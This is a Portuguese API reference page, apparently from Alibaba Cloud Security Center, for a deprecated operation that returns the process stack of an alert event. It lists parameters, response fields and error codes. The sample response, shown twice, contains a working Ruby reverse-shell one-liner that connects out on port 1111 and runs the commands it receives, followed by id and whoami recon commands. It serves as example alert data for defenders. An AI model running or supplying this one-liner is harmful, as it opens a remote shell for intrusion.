Consulta as informações da pilha de um evento de alerta.
Esta API foi descontinuada sem substituto. Embora o acesso temporário seja mantido, nenhuma atualização ou correção de bugs será fornecida. Para garantir a continuidade da funcionalidade, planeje sua migração e entre em contato com seu gerente de conta para obter suporte.
Experimente agora
Testar
Autorização RAM
|
Ação |
Nível de acesso |
Tipo de recurso |
Chave de condição |
Ação dependente |
|
yundun-sas:DescribeAlarmEventStackInfo |
get |
*All Resource
|
Nenhuma | Nenhuma |
Parâmetros da solicitação
|
Parâmetro |
Tipo |
Obrigatório |
Descrição |
Exemplo |
| SourceIp |
string |
Não |
O endereço IP de origem da solicitação. |
192.168.XX.XX |
| Lang |
string |
Não |
O idioma do conteúdo na solicitação e na resposta. Valor padrão: zh. Valores válidos:\n\n* zh: Chinês.\n* en: Inglês. |
zh |
| Uuid |
string |
Sim |
O UUID do servidor a ser consultado.\n\n> Você pode chamar a operação DescribeSuspEvents para consultar os UUIDs dos servidores. |
18b7336e-d469-473b-af83-8e5420f9**** |
| EventName |
string |
Sim |
O nome do evento.\n\n> Você pode chamar a operação DescribeSuspEvents para consultar os nomes dos eventos. |
Variable Trojan |
| UniqueInfo |
string |
Sim |
O ID do evento de alerta. |
1fbe8d16727f61d1478a674d6fa0**** |
| ResourceDirectoryAccountId |
integer |
Não |
O ID da conta Alibaba Cloud do membro no diretório de recursos.\n\n> Você pode chamar a operação DescribeMonitorAccounts para obter os IDs. |
127608589417**** |
Elementos de resposta
|
Elemento |
Tipo |
Descrição |
Exemplo |
|
object |
Os dados retornados. |
||
| StackInfo |
string |
As informações da pilha dos detalhes do alerta. |
[ { "child": [ { "child": [ { "child": [ ], "data": { "cmdline": "id", "proc_path": "/bin/id", "pid": "[3033]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } }, { "child": [ ], "data": { "cmdline": "whoami", "proc_path": "/bin/whoami", "pid": "[3035]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "cmdline": "/bin/bash -c 'id && whoami'", "proc_path": "/bin/bash", "pid": "[3022]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "src_ip": "0.0.0.0", "cmdline": "ruby -rsocket -e exit if fork;c=TCPSocket.new(\"0.0.0.0\",\"1111\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", "file": "ruby", "login_port": "22", "login_type": "password", "proc_path": "/usr/bin/ruby", "dst_port": "1111", "pid": "3011", "user": "root", "dst_ip": "0.0.0.0", "log_time": "2020-01-20 09:00:00" }, "description": { "extend": [ { "content": "${tpl_netstat}", "content_type": "text" } ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ] |
| RequestId |
string |
O ID da solicitação. |
ECC6B3E3-D496-512D-B46D-E6996A6B63EE |
Exemplos
Resposta de sucesso
JSON formato
{
"StackInfo": "[\n {\n \"child\": [\n {\n \"child\": [\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"id\",\n \"proc_path\": \"/bin/id\",\n \"pid\": \"[3033]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n },\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"whoami\",\n \"proc_path\": \"/bin/whoami\",\n \"pid\": \"[3035]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"cmdline\": \"/bin/bash -c 'id && whoami'\",\n \"proc_path\": \"/bin/bash\",\n \"pid\": \"[3022]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"src_ip\": \"0.0.0.0\",\n \"cmdline\": \"ruby -rsocket -e exit if fork;c=TCPSocket.new(\\\"0.0.0.0\\\",\\\"1111\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\",\n \"file\": \"ruby\",\n \"login_port\": \"22\",\n \"login_type\": \"password\",\n \"proc_path\": \"/usr/bin/ruby\",\n \"dst_port\": \"1111\",\n \"pid\": \"3011\",\n \"user\": \"root\",\n \"dst_ip\": \"0.0.0.0\",\n \"log_time\": \"2020-01-20 09:00:00\"\n },\n \"description\": {\n \"extend\": [\n {\n \"content\": \"${tpl_netstat}\",\n \"content_type\": \"text\"\n }\n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n]",
"RequestId": "ECC6B3E3-D496-512D-B46D-E6996A6B63EE"
}
Códigos de erro
|
Código de status HTTP |
Código de erro |
Mensagem de erro |
Descrição |
|---|---|---|---|
| 400 | NoPermission | no permission | |
| 400 | RdCheckNoPermission | Resource directory account verification has no permission. | |
| 500 | RdCheckInnerError | Resource directory account service internal error. | |
| 500 | ServerError | ServerError | |
| 403 | NoPermission | caller has no permission | You are not authorized to do this operation. |
Consulte Códigos de Erro para uma lista completa.
Notas de versão
Consulte Notas de Versão para uma lista completa.